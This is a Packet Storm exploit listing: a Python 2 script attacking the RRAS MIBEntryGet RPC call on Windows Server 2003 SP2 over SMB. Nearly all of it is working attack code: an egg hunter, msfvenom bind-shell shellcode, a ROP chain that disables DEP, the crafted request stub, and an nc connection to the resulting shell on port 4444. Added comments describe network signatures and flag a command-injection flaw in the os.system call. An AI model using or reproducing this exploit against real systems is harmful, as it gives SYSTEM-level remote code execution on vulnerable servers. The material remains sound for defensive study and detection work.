Microsoft Windows 2003 SP2 ERRATICGOPHER SMB Remote Code Execution

2017-04-26T00:00:00
ID PACKETSTORM:142313
Type packetstorm
Reporter vportal
Modified 2017-04-26T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
##################################################################################  
# By Victor Portal (vportal) for educational purpose only   
##################################################################################  
# This exploit is the python version of the ErraticGopher exploit probably #  
# with some modifications. ErraticGopher exploits a memory corruption #  
# (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet. #  
# Because of the magic bytes, the application redirects the execution to the #  
# iprtrmgr.dll library, where an instruction REPS MOVS (0x641194f5) copies #  
# all the injected stub from the heap to the stack, overwriting a return #  
# address as well as the SEH handler stored in the stack, making it possible #   
# to control the execution flow to disable DEP and jump to the shellcode #  
# as SYSTEM user. #  
##################################################################################  
#The exploit only works if target has the RRAS service enabled  
#Tested on Windows Server 2003 SP2  
  
import struct  
import sys  
import time  
import os  
  
from threading import Thread   
  
from impacket import smb  
from impacket import uuid  
from impacket import dcerpc  
from impacket.dcerpc.v5 import transport  
  
# Flat script (Python 2 syntax: bare `print` statements). Flow: open an SMB
# named-pipe transport to the host given on the command line, bind the RRAS
# RPC interface, build a crafted request stub, send it as opnum 0x1d, then
# sleep and connect with nc to TCP 4444.
# NOTE(review): sys.argv[1] is taken without any validation and is later
# concatenated into a shell command string (see the os.system call at the end).
target = sys.argv[1]  
  
print '[-]Initiating connection'  
# DCE/RPC over SMB (ncacn_np) through the \pipe\browser named pipe. From a
# defender's view, this SMB session plus the RPC bind below are the
# observable network events that precede the malformed request.
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)  
trans.connect()  
  
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target  
dce = trans.DCERPC_class(trans)  
#RRAS DCE-RPC CALL  
# Bind to interface 8f09f000-b7ed-11ce-bbd2-00001a181cad version 0.0 (RRAS,
# per the header comment). A bind to this UUID over \pipe\browser followed by
# an opnum 0x1d request with an oversized stub is the signature to alert on;
# the header also notes the RRAS service must be enabled on the target.
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))  
  
# First stage ("egg hunter"). The byte sequence 0x77 0x30 0x30 0x74 ("w00t")
# embedded here matches the "w00tw00t" marker placed directly before buf in
# the stub further down.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"  
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  
  
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python  
# Second stage produced by the msfvenom command above: a bind shell listening
# on TCP 4444 with NUL bytes excluded. The nc call at the end of the script
# connects to that port.
buf = ""  
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"  
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"  
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"  
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"  
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"  
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"  
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"  
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"  
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"  
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"  
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"  
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"  
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"  
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"  
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"  
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"  
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"  
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"  
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"  
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"  
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"  
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"  
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"  
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"  
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"  
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"  
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"  
buf += "\xc4\x25\x3d\xe9"  
  
#NX disable routine for Windows Server 2003 SP2  
# ROP chain built from fixed absolute addresses (the inline comments attribute
# them to ws_32.dll, gdi32.dll and msvcrt.dll). Hard-coded addresses tie this
# chain to the exact OS build named in the header (Windows Server 2003 SP2);
# a build that maps those modules elsewhere, or one with address-space
# randomisation, will not match these values.
rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll  
rop += "\x45"*16  
rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll  
rop += "\x5d\x7a\x81\x7c" #ret 20  
rop += "\x71\x42\x38\x77" #jmp esp  
rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll  
rop += "\x90"*2 + egghunter + "\x90"*42  
rop += "\x17\xf5\x83\x7c" #Disable NX routine  
rop += "\x90"*4  
  
# Request stub for opnum 0x1d. The leading and trailing "Magic bytes" are the
# fixed fields the header comment says steer execution into iprtrmgr.dll. The
# "\x42" repeat count on the second line is computed so that the section made
# of the "\x41" prefix, rop, the 100-byte "\xCC" filler, the 8-byte marker,
# buf and the padding totals 1313 bytes.
stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes  
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))  
stub += "\x12" #Magic byte  
stub += "\x46"*522  
stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes  
  
  
# Single RPC request carrying the crafted stub; the return value is not
# inspected, so the script reports "successfully" regardless of the outcome.
dce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function)  
print "[-]Exploit sent to target successfully..."  
  
print "Waiting for shell..."  
# Fixed 5 s delay, then an interactive nc connection to TCP 4444 on the host.
# NOTE(review): `target` comes straight from argv and is concatenated into a
# shell string, so any shell metacharacters in that argument are interpreted
# by os.system on the machine running this script.
time.sleep(5)  
os.system("nc " + target + " 4444")  
  
`